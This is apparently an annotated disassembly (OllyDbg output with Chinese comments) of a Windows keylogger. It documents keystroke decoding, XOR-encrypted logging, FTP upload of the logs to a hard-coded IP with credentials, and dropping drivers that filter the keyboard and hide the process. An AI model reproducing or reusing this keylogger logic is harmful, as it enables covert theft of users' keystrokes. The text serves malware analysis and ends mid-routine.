OD贴过来的 ------------------------------------------------------; 键盘扫描码解码函数--------------------------------------------- 004014BA push ebp 004014BB mov ebp,esp 004014BD push ecx 004014BE /mov eax,[ebp+8] 004014C1 |xor ecx,ecx 004014C3 |mov cx,[eax] 004014C6 |test ecx,ecx 004014C8 |je 00401594 ; 如果传入的扫描数据为空则跳转 004014CE |mov edx,[ebp+8] 004014D1 |xor eax,eax 004014D3 |mov ax,[edx] 004014D6 |cmp eax,0EE 004014DB |je short 004014EA ; 如果传入的指针指向的数据为0XEE则跳转 004014DD |mov ecx,[ebp+8] 004014E0 |xor edx,edx 004014E2 |mov dx,[ecx] 004014E5 |cmp edx,1C 004014E8 |jnz short 00401500 ; 如果传入的指针指向的数据不等于0X1C则跳转 004014EA |mov eax,[ebp+C] ; 004014ED |push eax ; /Arg2 传入的文件名 004014EE |push 0040426C ; |Arg1 = 0040426C ASCII CR,LF,"" 004014F3 |call 004015A9 ; \kblog.004015A9 将字符CR,LF,""写入指定的文件中 004014F8 |add esp,8 004014FB |jmp 00401586 00401500 |mov dword ptr [ebp-4],0 00401507 |jmp short 00401512 00401509 |/mov ecx,[ebp-4] 0040150C ||add ecx,1 0040150F ||mov [ebp-4],ecx 00401512 | cmp dword ptr [ebp-4],52 00401516 ||jge short 00401586 ; 循环变量i大于等于82 则跳转 00401518 ||cmp dword ptr [ebp-4],19 0040151C ||jge short 00401552 ; 循环变量i大于等于25 则跳转 0040151E ||mov edx,[ebp+8] 00401521 ||xor eax,eax 00401523 ||mov ax,[edx] 00401526 ||mov ecx,[ebp-4] 00401529 ||xor edx,edx 0040152B ||mov dx,[ecx*2+404210] 00401533 ||cmp eax,edx 00401535 ||jnz short 00401552 ; 如果不是小键盘数据则跳转 00401537 ||mov eax,[ebp+C] 0040153A ||push eax ; /Arg2 0040153B ||mov ecx,[ebp-4] ; | 0040153E ||imul ecx,ecx,6 ; | 00401541 ||add ecx,00404024 ; | 00401547 ||push ecx ; |Arg1 00401548 ||call 004015A9 ; \kblog.004015A9 将小键盘对应的字符写入文件 0040154D ||add esp,8 00401550 ||jmp short 00401586 00401552 ||cmp dword ptr [ebp-4],19 00401556 ||jl short 00401584 00401558 ||mov edx,[ebp+8] 0040155B ||xor eax,eax 0040155D ||mov ax,[edx] 00401560 ||mov ecx,[ebp-4] 00401563 ||sub ecx,17 00401566 ||cmp eax,ecx 00401568 ||jnz short 00401584 ; 如果不是主键区扫描码 0040156A ||mov edx,[ebp+C] 0040156D ||push edx ; /Arg2 0040156E ||mov eax,[ebp-4] ; | 00401571 ||imul eax,eax,6 ; | 00401574 ||add eax,00404024 ; | 00401579 ||push eax ; |Arg1 0040157A ||call 004015A9 ; \kblog.004015A9 将主键区扫描码对应的字符写入文件 0040157F ||add esp,8 00401582 ||jmp short 00401586 00401584 |\jmp short 00401509 00401586 |mov ecx,[ebp+8] 00401589 |add ecx,2 ; 扫描码当前指针加2 0040158C |mov [ebp+8],ecx 0040158F \jmp 004014BE 00401594 mov edx,[ebp+C] 00401597 push edx ; /Arg2 00401598 push 00404270 ; |Arg1 = 00404270 ASCII CR,LF,"" 0040159D call 004015A9 ; \kblog.004015A9 字符存入文件 004015A2 add esp,8 004015A5 mov esp,ebp 004015A7 pop ebp 004015A8 retn ------------------------------------------------------; 键盘记录加密保存函数--------------------------------------------- 004015A9 push ebp 004015AA mov ebp, esp 004015AC push -1 004015AE push 0040265D ; SE 处理程序安装 004015B3 mov eax, dword ptr fs:[0] 004015B9 push eax 004015BA mov dword ptr fs:[0], esp 004015C1 sub esp, 36C 004015C7 push esi 004015C8 push 1 004015CA lea ecx, dword ptr [ebp-170] 004015D0 call dword ptr [<&MSVCIRT.fstream::fstre>; 定义流文件对象 004015D6 mov dword ptr [ebp-4], 0 004015DD mov eax, dword ptr [ebp+8] 004015E0 push eax ; /src 参数传入的字串 004015E1 lea ecx, dword ptr [ebp-378] ; | 004015E7 push ecx ; |dest 004015E8 call ; \strcpy 004015ED add esp, 8 004015F0 lea edx, dword ptr [ebp-378] 004015F6 push edx ; /s 004015F7 call ; \strlen 得到传入字串长度 004015FC add esp, 4 004015FF mov dword ptr [ebp-178], eax ;保存长度 00401605 mov dword ptr [ebp-174], 0 0040160F jmp short 00401620 00401611 /mov eax, dword ptr [ebp-174] 00401617 |add eax, 1 0040161A |mov dword ptr [ebp-174], eax ;;dword ptr [ebp-174] ++ 00401620 mov ecx, dword ptr [ebp-174] 00401626 |cmp ecx, dword ptr [ebp-178] 0040162C |jge short 00401683 ;处理过的字符数量如果超过了传入字串的长度则跳转 0040162E |mov edx, dword ptr [ebp-174] 00401634 |movsx ecx, byte ptr [ebp+edx-378] 0040163C |mov eax, dword ptr [404768] 00401641 |cdq 00401642 |mov esi, 0A 00401647 |idiv esi ;模运算: dword ptr [404768] % 10,结果存edx 00401649 |movsx edx, byte ptr [edx+404018] 00401650 |xor ecx, edx ;异或运算:传入串的第dword ptr [ebp-174]个值^ptr [404018]第edx个值 00401652 |mov eax, dword ptr [ebp-174] 00401658 |mov byte ptr [ebp+eax-378], cl ;异或运算结果存回: 传入串的第dword ptr [ebp-174]个值 0040165F |mov ecx, dword ptr [404768] 00401665 |add ecx, 1 00401668 |mov dword ptr [404768], ecx ;dword ptr [404768] ++ 0040166E |cmp dword ptr [404768], 9 00401675 |jle short 00401681 ;如果dword ptr [404768]的值小于等于9则跳转 00401677 |mov dword ptr [404768], 0 00401681 \jmp short 00401611 00401683 mov edx, dword ptr [ebp+C] 00401686 push edx ; /src 00401687 lea eax, dword ptr [ebp-10C] ; | 0040168D push eax ; |dest 0040168E call ; \strcpy 复制传入的字串 00401693 add esp, 8 00401696 mov ecx, dword ptr [<&MSVCIRT.filebuf::>; MSVCIRT.filebuf::openprot 0040169C mov edx, dword ptr [ecx] 0040169E push edx 0040169F push 8A 004016A4 lea eax, dword ptr [ebp-10C] 004016AA push eax 004016AB lea ecx, dword ptr [ebp-170] 004016B1 call dword ptr [<&MSVCIRT.fstream::open>>; MSVCIRT.fstream::open创建文件对象,名字为传入的字串 004016B7 mov ecx, dword ptr [ebp-170] 004016BD mov edx, dword ptr [ecx+4] 004016C0 lea ecx, dword ptr [ebp+edx-170] 004016C7 call dword ptr [<&MSVCIRT.ios::fail>] ; MSVCIRT.ios::fail 004016CD test eax, eax 004016CF jnz short 004016F7 ;如果创建失败则跳转 004016D1 mov eax, dword ptr [ebp-178] 004016D7 push eax 004016D8 lea ecx, dword ptr [ebp-378] 004016DE push ecx 004016DF lea ecx, dword ptr [ebp-164] 004016E5 call dword ptr [<&MSVCIRT.ostream::write>; MSVCIRT.ostream::write 把传入的字串写入文件 004016EB lea ecx, dword ptr [ebp-170] 004016F1 call dword ptr [<&MSVCIRT.fstream::close>; MSVCIRT.fstream::close 关闭文件 004016F7 mov dword ptr [ebp-4], -1 004016FE lea ecx, dword ptr [ebp-170] 00401704 call dword ptr [<&MSVCIRT.fstream::`vbas>; MSVCIRT.fstream::`vbase destructor'释放文件对象 0040170A mov ecx, dword ptr [ebp-C] 0040170D mov dword ptr fs:[0], ecx 00401714 pop esi 00401715 mov esp, ebp 00401717 pop ebp 00401718 retn ------------------------------------------------------; 记录文件上传函数--------------------------------------------- 00401719 push ebp 0040171A mov ebp,esp 0040171C sub esp,764 00401722 mov dword ptr [ebp-318],0 0040172C mov dword ptr [ebp-8],0 00401733 mov dword ptr [ebp-4],0 0040173A mov dword ptr [ebp-55C],0 00401744 mov dword ptr [ebp-310],0 0040174E mov dword ptr [ebp-660],15 00401758 mov dword ptr [ebp-C],0 0040175F push 00404274 ; /src = "59.34.131.54" 上传ftp地址 00401764 lea eax,[ebp-10C] ; | 0040176A push eax ; |dest 0040176B call ; \strcpy 00401770 add esp,8 00401773 push 00404284 ; /src = "coco" 帐户 00401778 lea ecx,[ebp-20C] ; | 0040177E push ecx ; |dest 0040177F call ; \strcpy 00401784 add esp,8 00401787 push 0040428C ; /src = "upstair" 密码 0040178C lea edx,[ebp-65C] ; | 00401792 push edx ; |dest 00401793 call ; \strcpy 00401798 add esp,8 0040179B push 00404294 ; /src = "\cert\cnt\*" 记数器目录 004017A0 lea eax,[ebp-760] ; | 004017A6 push eax ; |dest 004017A7 call ; \strcpy 004017AC add esp,8 004017AF mov ecx,[ebp+8] 004017B2 push ecx ; /src 004017B3 lea edx,[ebp-418] ; | 004017B9 push edx ; |dest 004017BA call ; \strcpy 004017BF add esp,8 004017C2 lea eax,[ebp-558] 004017C8 push eax ; /pFindFileData 004017C9 lea ecx,[ebp-418] ; | 004017CF push ecx ; |FileName 004017D0 call [<&KERNEL32.FindFirstFileA>] ; \FindFirstFileA 记录文件是否存在 004017D6 mov [ebp-55C],eax 004017DC cmp dword ptr [ebp-55C],0 004017E3 jnz short 004017EC ; 如果存在则跳转 004017E5 xor eax,eax 004017E7 jmp 00401B35 ; 返回 004017EC call [<&KERNEL32.GetTickCount>] ; [GetTickCount 004017F2 mov [ebp-314],eax ; 记录经历的时间 004017F8 /cmp dword ptr [ebp-318],0 004017FF |jnz short 00401843 ; 如果IEXPLORE.EXE句柄已经打开成功则跳转 00401801 |call [<&KERNEL32.GetTickCount>] ; [GetTickCount 00401807 |mov [ebp-764],eax ; 记录经历的时间 0040180D |mov edx,[ebp-764] ; 00401813 |sub edx,[ebp-314] 00401819 |cmp edx,1388 0040181F |jbe short 00401828 ; 如果打开句柄的时间小于等于5秒则跳转 00401821 |xor eax,eax 00401823 |jmp 00401B35 ; 否则打开IEXPLORE.EXE句柄超时返回 00401828 |push 0 0040182A |push 0 0040182C |push 0 0040182E |push 0 00401830 |push 004042A0 ; ASCII "IEXPLORE.EXE" 00401835 |call [<&WININET.InternetOpenA>] ; WININET.InternetOpenA 打开IEXPLORE.EXE句柄 0040183B |mov [ebp-318],eax 00401841 \jmp short 004017F8 ; 循环 00401843 call [<&KERNEL32.GetTickCount>] ; [GetTickCount 00401849 mov [ebp-314],eax 0040184F /cmp dword ptr [ebp-8],0 00401853 |jnz short 004018BD ; InternetConnect函数句柄已打开则跳转 00401855 |call [<&KERNEL32.GetTickCount>] ; [GetTickCount 0040185B |mov [ebp-764],eax 00401861 |mov eax,[ebp-764] 00401867 |sub eax,[ebp-314] 0040186D |cmp eax,1770 00401872 |jbe short 00401888 ; 如果连接时间小于等于6秒则跳转 00401874 |mov ecx,[ebp-318] ; 否则网络连接超时、返回 0040187A |push ecx 0040187B |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401881 |xor eax,eax 00401883 |jmp 00401B35 00401888 |push 0 0040188A |push 0 0040188C |push 1 0040188E |lea edx,[ebp-65C] 00401894 |push edx 00401895 |lea eax,[ebp-20C] 0040189B |push eax 0040189C |mov cx,[ebp-660] 004018A3 |push ecx 004018A4 |lea edx,[ebp-10C] 004018AA |push edx 004018AB |mov eax,[ebp-318] 004018B1 |push eax 004018B2 |call [<&WININET.InternetConnectA>] ; WININET.InternetConnectA 网络连接 004018B8 |mov [ebp-8],eax 004018BB \jmp short 0040184F 004018BD call [<&KERNEL32.GetTickCount>] ; [GetTickCount 004018C3 mov [ebp-314],eax 004018C9 /cmp dword ptr [ebp-4],0 004018CD |jnz short 0040192E ; 如果FTP指定目录内文件存在则跳转 004018CF |call [<&KERNEL32.GetTickCount>] ; [GetTickCount 004018D5 |mov [ebp-764],eax 004018DB |mov ecx,[ebp-764] 004018E1 |sub ecx,[ebp-314] 004018E7 |cmp ecx,2710 004018ED |jbe short 0040190D ; 如果10秒内没找到指定文件则跳转 004018EF |mov edx,[ebp-8] 004018F2 |push edx 004018F3 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 004018F9 |mov eax,[ebp-318] 004018FF |push eax 00401900 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401906 |xor eax,eax 00401908 |jmp 00401B35 0040190D |push 0 0040190F |push 0 00401911 |lea ecx,[ebp-558] 00401917 |push ecx 00401918 |lea edx,[ebp-760] 0040191E |push edx 0040191F |mov eax,[ebp-8] 00401922 |push eax 00401923 |call [<&WININET.FtpFindFirstFileA>] ; WININET.FtpFindFirstFileA 搜索ftp上指定目录的指定文件 00401929 |mov [ebp-4],eax 0040192C \jmp short 004018C9 ; 循环 0040192E push 004042B0 ; /src = "\cert\cnt\" 00401933 lea ecx,[ebp-30C] ; | 00401939 push ecx ; |dest 0040193A call ; \strcpy 0040193F add esp,8 00401942 lea edx,[ebp-30C] 00401948 push edx ; /src 00401949 lea eax,[ebp-760] ; | 0040194F push eax ; |dest 00401950 call ; \strcpy 00401955 add esp,8 00401958 lea ecx,[ebp-52C] 0040195E push ecx ; /src 0040195F lea edx,[ebp-30C] ; | 00401965 push edx ; |dest 00401966 call ; \strcat 0040196B add esp,8 0040196E lea eax,[ebp-52C] 00401974 push eax ; /s 00401975 call [<&MSVCRT.atol>] ; \atol 把找到的文件名转化为数字形式 0040197B add esp,4 0040197E mov [ebp-C],eax 00401981 mov ecx,[ebp-C] 00401984 add ecx,1 ; 文件名数字加1 00401987 mov [ebp-C],ecx 0040198A push 0A ; /radix = A (10.) 0040198C lea edx,[ebp-10C] ; | 00401992 push edx ; |string 00401993 mov eax,[ebp-C] ; | 00401996 push eax ; |value 00401997 call [<&MSVCRT._ltoa>] ; \_ltoa 数字再转成字符型文件名 0040199D add esp,0C 004019A0 lea ecx,[ebp-10C] 004019A6 push ecx ; /src 004019A7 lea edx,[ebp-760] ; | 004019AD push edx ; |dest 004019AE call ; \strcat 004019B3 add esp,8 004019B6 call [<&KERNEL32.GetTickCount>] ; [GetTickCount 004019BC mov [ebp-314],eax 004019C2 /cmp dword ptr [ebp-310],0 004019C9 |jnz short 00401A32 004019CB |call [<&KERNEL32.GetTickCount>] ; [GetTickCount 004019D1 |mov [ebp-764],eax 004019D7 |mov eax,[ebp-764] 004019DD |sub eax,[ebp-314] 004019E3 |cmp eax,2710 004019E8 |jbe short 00401A12 ; 如果10秒内改名没成功则跳转 004019EA |mov ecx,[ebp-8] 004019ED |push ecx 004019EE |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 004019F4 |mov edx,[ebp-318] 004019FA |push edx 004019FB |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401A01 |mov eax,[ebp-4] 00401A04 |push eax 00401A05 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401A0B |xor eax,eax 00401A0D |jmp 00401B35 00401A12 |lea ecx,[ebp-760] 00401A18 |push ecx 00401A19 |lea edx,[ebp-30C] 00401A1F |push edx 00401A20 |mov eax,[ebp-8] 00401A23 |push eax 00401A24 |call [<&WININET.FtpRenameFileA>] ; WININET.FtpRenameFileA 改名:作为文件名的数字加1 00401A2A |mov [ebp-310],eax 00401A30 \jmp short 004019C2 00401A32 push 004042BC ; /src = "\cert\dat\" 记录文件目录 00401A37 lea ecx,[ebp-760] ; | 00401A3D push ecx ; |dest 00401A3E call ; \strcpy 00401A43 add esp,8 00401A46 lea edx,[ebp-10C] 00401A4C push edx ; /src 00401A4D lea eax,[ebp-760] ; | 00401A53 push eax ; |dest 00401A54 call ; \strcat 00401A59 add esp,8 00401A5C push 004042C8 ; /src = ".dat" 00401A61 lea ecx,[ebp-760] ; | 00401A67 push ecx ; |dest 00401A68 call ; \strcat 00401A6D add esp,8 00401A70 mov dword ptr [ebp-310],0 00401A7A call [<&KERNEL32.GetTickCount>] ; [GetTickCount 00401A80 mov [ebp-314],eax 00401A86 /cmp dword ptr [ebp-310],0 00401A8D |jnz short 00401AF8 ; 向FTP目录写入文件成功则跳转 00401A8F |call [<&KERNEL32.GetTickCount>] ; [GetTickCount 00401A95 |mov [ebp-764],eax 00401A9B |mov edx,[ebp-764] 00401AA1 |sub edx,[ebp-314] 00401AA7 |cmp edx,4E20 00401AAD |jbe short 00401AD4 ; 如果写入用时小于等于20秒则跳转 00401AAF |mov eax,[ebp-8] 00401AB2 |push eax 00401AB3 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401AB9 |mov ecx,[ebp-318] 00401ABF |push ecx 00401AC0 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401AC6 |mov edx,[ebp-4] 00401AC9 |push edx 00401ACA |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401AD0 |xor eax,eax 00401AD2 |jmp short 00401B35 00401AD4 |push 0 00401AD6 |push 2 00401AD8 |lea eax,[ebp-760] 00401ADE |push eax 00401ADF |lea ecx,[ebp-418] 00401AE5 |push ecx 00401AE6 |mov edx,[ebp-8] 00401AE9 |push edx 00401AEA |call [<&WININET.FtpPutFileA>] ; WININET.FtpPutFileA 向FTP指定目录写入文件 00401AF0 |mov [ebp-310],eax 00401AF6 \jmp short 00401A86 ; 循环 00401AF8 lea eax,[ebp-418] 00401AFE push eax ; /FileName 00401AFF call [<&KERNEL32.DeleteFileA>] ; \DeleteFileA 写入完成后删除本地文件 00401B05 mov ecx,[ebp-8] 00401B08 push ecx 00401B09 call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401B0F mov edx,[ebp-318] 00401B15 push edx 00401B16 call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401B1C mov eax,[ebp-4] 00401B1F push eax 00401B20 call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle 00401B26 mov dword ptr [404768],0 00401B30 mov eax,1 00401B35 mov esp,ebp 00401B37 pop ebp 00401B38 retn ------------------------------------------------------;主程序入口--------------------------- 00401B39 >push ebp 00401B3A mov ebp,esp 00401B3C push -1 00401B3E push 00402681 ; SE 处理程序安装 00401B43 mov eax,fs:[0] 00401B49 push eax 00401B4A mov fs:[0],esp 00401B51 sub esp,0AC0 00401B57 mov dword ptr [ebp-AC4],0 00401B61 mov dword ptr [ebp-6BC],0 00401B6B mov dword ptr [ebp-398],0 00401B75 mov dword ptr [ebp-4A4],0 00401B7F mov dword ptr [ebp-5B0],0 00401B89 mov dword ptr [ebp-218],0 00401B93 mov dword ptr [ebp-5AC],0 ------------------------------------------------------; 建立流文件对象-------------------------- 00401B9D push 1 00401B9F lea ecx,[ebp-84] 00401BA5 call [<&MSVCIRT.fstream::fstream>] ; MSVCIRT.fstream::fstream 00401BAB mov dword ptr [ebp-4],0 00401BB2 push 1 00401BB4 lea ecx,[ebp-380] 00401BBA call [<&MSVCIRT.fstream::fstream>] ; MSVCIRT.fstream::fstream 00401BC0 mov byte ptr [ebp-4],1 ----------------------------------------------------------------------------------------------- 00401BC4 mov dword ptr [ebp-31C],004042D0 ; ASCII "\kbdrv.sys" 键盘过滤驱动文件名 00401BCE mov dword ptr [ebp-20],004042DC ; ASCII "\msdtx.sys" 隐藏进程驱动文件名 00401BD5 mov dword ptr [ebp-14],0 00401BDC mov dword ptr [ebp-38C],0 00401BE6 mov dword ptr [ebp-39C],0 00401BF0 mov dword ptr [ebp-10],0 00401BF7 call 004012B0 ; 检测是否具备administrator权限 00401BFC mov [ebp-38C],eax 00401C02 cmp dword ptr [ebp-38C],0 00401C09 jnz short 00401C10 ; 如具备权限则跳转 00401C0B jmp 004023B0 ; 否则返回(释放流文件对象并退出) 00401C10 push 0 00401C12 call [<&KERNEL32.GetModuleHandleA>] ; KERNEL32.GetModuleHandleA 00401C18 mov [ebp-18],eax 00401C1B lea eax,[ebp-49C] ------------------------------------------------------; 定位并加载隐藏进程的驱动文件-------------- 00401C21 push eax 00401C22 push 100 00401C27 call [<&KERNEL32.GetCurrentDirectoryA>] ; KERNEL32.GetCurrentDirectoryA 00401C2D mov ecx,[ebp-20] 00401C30 push ecx 00401C31 lea edx,[ebp-49C] 00401C37 push edx 00401C38 call ; 带路径的驱动文件名 00401C3D add esp,8 00401C40 lea eax,[ebp-49C] 00401C46 mov [40455C],eax 00401C4B push 004042E8 ; ASCII "sys" 00401C50 push 6A 00401C52 mov ecx,[ebp-18] 00401C55 push ecx ; 00401C56 call [<&KERNEL32.FindResourceA>] ; KERNEL32.FindResourceA 在资源中定位 00401C5C mov [ebp-390],eax 00401C62 cmp dword ptr [ebp-390],0 00401C69 jnz short 00401C70 ; 如定位成功则跳转 00401C6B jmp 004023B0 ; 否则返回 00401C70 mov edx,[ebp-390] 00401C76 push edx 00401C77 mov eax,[ebp-18] 00401C7A push eax 00401C7B call [<&KERNEL32.LoadResource>] ; KERNEL32.LoadResource 加载至内存 00401C81 mov [ebp-6B8],eax 00401C87 cmp dword ptr [ebp-6B8],0 00401C8E jnz short 00401C95 ; 如加载成功则跳转 00401C90 jmp 004023B0 ; 否则返回 ------------------------------------------------------; 生成驱动文件msdtx.sys(用于隐藏自身进程)------- 00401C95 mov ecx,[ebp-6B8] 00401C9B push ecx 00401C9C call [<&KERNEL32.LockResource>] ; KERNEL32.SetHandleCount 设置可用句柄 00401CA2 mov [ebp-1C],eax 00401CA5 cmp dword ptr [ebp-1C],0 00401CA9 jnz short 00401CB0 ; 如设置成功则跳转 00401CAB jmp 004023B0 ; 否则返回 00401CB0 mov edx,[ebp-390] 00401CB6 push edx 00401CB7 mov eax,[ebp-18] 00401CBA push eax 00401CBB call [<&KERNEL32.SizeofResource>] ; KERNEL32.SizeofResource 资源尺寸 00401CC1 mov [ebp-4A0],eax 00401CC7 mov ecx,[<&MSVCIRT.filebuf::openprot>] ; MSVCIRT.filebuf::openprot 00401CCD mov edx,[ecx] 00401CCF push edx 00401CD0 push 8A 00401CD5 mov eax,[40455C] 00401CDA push eax 00401CDB lea ecx,[ebp-380] 00401CE1 call [<&MSVCIRT.fstream::open>] ; 打开用于建立文件 00401CE7 mov ecx,[ebp-380] 00401CED mov edx,[ecx+4] 00401CF0 lea ecx,[ebp+edx-380] 00401CF7 call [<&MSVCIRT.ios::fail>] ; MSVCIRT.ios::fail 00401CFD test eax,eax 00401CFF je short 00401D06 ; 如打开成功 则跳转 00401D01 jmp 004023B0 ; 否则返回 00401D06 mov eax,[ebp-4A0] 00401D0C push eax 00401D0D mov ecx,[ebp-1C] 00401D10 push ecx 00401D11 lea ecx,[ebp-374] 00401D17 call [<&MSVCIRT.ostream::write>] ; MSVCIRT.ostream::write 写入文件 00401D1D lea ecx,[ebp-380] 00401D23 call [<&MSVCIRT.fstream::close>] ; MSVCIRT.fstream::close 关闭文件 ------------------------------------------------------; 初始化驱动并隐藏自身进程---------------- 00401D29 call 004023F1 ; 初始化驱动 00401D2E cmp eax,-1 00401D31 jnz short 00401D45 ; 初始化成功则跳转 00401D33 mov edx,[40455C] ; 否则删除驱动文件并返回 00401D39 push edx 00401D3A call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA 00401D40 jmp 004023B0 00401D45 call [<&MSVCRT._getpid>] ; MSVCRT._getpid 得到自身进程PID 00401D4B mov [ebp-384],eax 00401D51 mov eax,[ebp-384] 00401D57 push eax 00401D58 call 004025A3 ; 隐藏自身进程 00401D5D add esp,4 00401D60 mov [ebp-6B4],eax 00401D66 cmp dword ptr [ebp-6B4],0 00401D6D jnz short 00401D81 ; 隐藏成功则跳转 00401D6F mov ecx,[40455C] ; 否则删除文件并返回 00401D75 push ecx 00401D76 call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA 00401D7C jmp 004023B0 00401D81 mov edx,[40455C] 00401D87 push edx ; 00401D88 call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA ------------------------------------------------------; 定位并加载键盘过滤的驱动文件-------------- 00401D8E lea eax,[ebp-49C] 00401D94 push eax 00401D95 push 100 00401D9A call [<&KERNEL32.GetCurrentDirectoryA>] ; KERNEL32.GetCurrentDirectoryA 00401DA0 mov ecx,[ebp-31C] 00401DA6 push ecx 00401DA7 lea edx,[ebp-49C] 00401DAD push edx 00401DAE call ; 带路径的驱动文件名 00401DB3 add esp,8 00401DB6 lea eax,[ebp-49C] 00401DBC mov [40455C],eax 00401DC1 push 004042EC ; ASCII "sys" 00401DC6 push 69 00401DC8 mov ecx,[ebp-18] 00401DCB push ecx 00401DCC call [<&KERNEL32.FindResourceA>] ; KERNEL32.FindResourceA 定位 00401DD2 mov [ebp-390],eax 00401DD8 cmp dword ptr [ebp-390],0 00401DDF jnz short 00401DE6 ; 如定位成功则跳转 00401DE1 jmp 004023B0 ; 否则返回 00401DE6 mov edx,[ebp-390] 00401DEC push edx 00401DED mov eax,[ebp-18] 00401DF0 push eax 00401DF1 call [<&KERNEL32.LoadResource>] ; KERNEL32.LoadResource 加载至内存 00401DF7 mov [ebp-6B8],eax 00401DFD cmp dword ptr [ebp-6B8],0 00401E04 jnz short 00401E0B ; 如加载成功则跳转 00401E06 jmp 004023B0 ; 否则返回 ------------------------------------------------------; 生成驱动文件kbdrv.sys(用于键盘过滤)-------------- 00401E0B mov ecx,[ebp-6B8] 00401E11 push ecx 00401E12 call [<&KERNEL32.LockResource>] ; KERNEL32.SetHandleCount 设置可用句柄 00401E18 mov [ebp-1C],eax 00401E1B cmp dword ptr [ebp-1C],0 00401E1F jnz short 00401E26 ; 如设置成功则跳转 00401E21 jmp 004023B0 ; 否则返回 00401E26 mov edx,[ebp-390] 00401E2C push edx 00401E2D mov eax,[ebp-18] 00401E30 push eax 00401E31 call [<&KERNEL32.SizeofResource>] ; KERNEL32.SizeofResource 资源尺寸 00401E37 mov [ebp-4A0],eax 00401E3D mov ecx,[<&MSVCIRT.filebuf::openprot>] ; MSVCIRT.filebuf::openprot 00401E43 mov edx,[ecx] 00401E45 push edx 00401E46 push 8A 00401E4B mov eax,[40455C] 00401E50 push eax 00401E51 lea ecx,[ebp-380] 00401E57 call [<&MSVCIRT.fstream::open>] ; 打开用于建立文件 00401E5D mov ecx,[ebp-380] 00401E63 mov edx,[ecx+4] 00401E66 lea ecx,[ebp+edx-380] 00401E6D call [<&MSVCIRT.ios::fail>] ; MSVCIRT.ios::fail 00401E73 test eax,eax 00401E75 je short 00401E7C ; 如打开成功 则跳转 00401E77 jmp 004023B0 ; 否则返回 00401E7C mov eax,[ebp-4A0] 00401E82 push eax 00401E83 mov ecx,[ebp-1C] 00401E86 push ecx 00401E87 lea ecx,[ebp-374] 00401E8D call [<&MSVCIRT.ostream::write>] ; MSVCIRT.ostream::write 写入文件 00401E93 lea ecx,[ebp-380] 00401E99 call [<&MSVCIRT.fstream::close>] ; MSVCIRT.fstream::close 关闭文件 ------------------------------------------------------; 安装并启动服务---------------------------- 00401E9F push 0F003F 00401EA4 push 0 00401EA6 push 0 00401EA8 call [<&ADVAPI32.OpenSCManagerA>] ; 打开服务控制管理器 00401EAE mov [ebp-14],eax 00401EB1 cmp dword ptr [ebp-14],0 00401EB5 jnz short 00401EC9 ; 如打开成功 则跳转 00401EB7 mov edx,[40455C] ; 否则删除文件并返回 00401EBD push edx 00401EBE call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA 00401EC4 jmp 004023B0 00401EC9 mov eax,[40455C] 00401ECE push eax 00401ECF mov ecx,[404260] ; 00401ED5 push ecx 00401ED6 mov edx,[ebp-14] 00401ED9 push edx 00401EDA call 004013EC ; 安装服务 00401EDF add esp,0C 00401EE2 mov [ebp-38C],eax 00401EE8 cmp dword ptr [ebp-38C],0 00401EEF jnz short 00401F02 ; 安装成功则跳转 00401EF1 mov eax,[40455C] ; 否则删除文件并返回 00401EF6 push eax 00401EF7 call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA 00401EFD jmp 004023B0 00401F02 mov ecx,[404260] ; kblog.00404264 00401F08 push ecx 00401F09 mov edx,[ebp-14] 00401F0C push edx ; 00401F0D call 0040143B ; 启动服务 00401F12 add esp,8 ; 00401F15 mov [ebp-38C],eax 00401F1B cmp dword ptr [ebp-38C],0 00401F22 jnz short 00401F35 ; 启动成功则跳转 00401F24 mov eax,[40455C] ; 否则删除文件并返回 00401F29 push eax 00401F2A call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA 00401F30 jmp 004023B0 ; 00401F35 mov ecx,[40455C] 00401F3B push ecx 00401F3C call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA ------------------------------------------------------; 初始化记录文件路径和临时文件名--- 00401F42 push 100 00401F47 push 0 00401F49 lea edx,[ebp-6B0] 00401F4F push edx 00401F50 call ; 路径串清空 00401F55 add esp,0C 00401F58 lea eax,[ebp-6B0] 00401F5E push eax 00401F5F push 100 00401F64 call [<&KERNEL32.GetTempPathA>] ; KERNEL32.GetTempPathA 得到Temp路径 00401F6A push 100 00401F6F push 0 00401F71 lea ecx,[ebp-5A8] 00401F77 push ecx 00401F78 call ; 文件名串清空 00401F7D add esp,0C 00401F80 lea edx,[ebp-5A8] 00401F86 push edx 00401F87 push 0 00401F89 push 0 00401F8B lea eax,[ebp-6B0] 00401F91 push eax 00401F92 call [<&KERNEL32.GetTempFileNameA>] ; KERNEL32.GetTempFileNameA 得到文件名 00401F98 lea ecx,[ebp-214] 00401F9E push ecx 00401F9F push 2 00401FA1 call [<&WS2_32.#115>] ; WS2_32.WSAStartup Socket初始化 00401FA7 test eax,eax 00401FA9 jnz 00402053 ; 初始化不成功则跳转 ------------------------------------------------------; 记录计算机名和IP------------------------------ 00401FAF push 100 ; 00401FB4 lea edx,[ebp-318] 00401FBA push edx 00401FBB call [<&WS2_32.#57>] ; WS2_32.gethostname 得到主机名 00401FC1 test eax,eax 00401FC3 jnz 0040204D ; 没得到则跳转 00401FC9 lea eax,[ebp-318] 00401FCF push eax 00401FD0 call [<&WS2_32.#52>] ; WS2_32.gethostbyname 得到主机信息 00401FD6 mov [ebp-394],eax 00401FDC cmp dword ptr [ebp-394],0 ; 00401FE3 je short 0040204D ; 没得到则跳转 00401FE5 mov ecx,[ebp-394] 00401FEB mov edx,[ecx+C] 00401FEE mov eax,[edx] 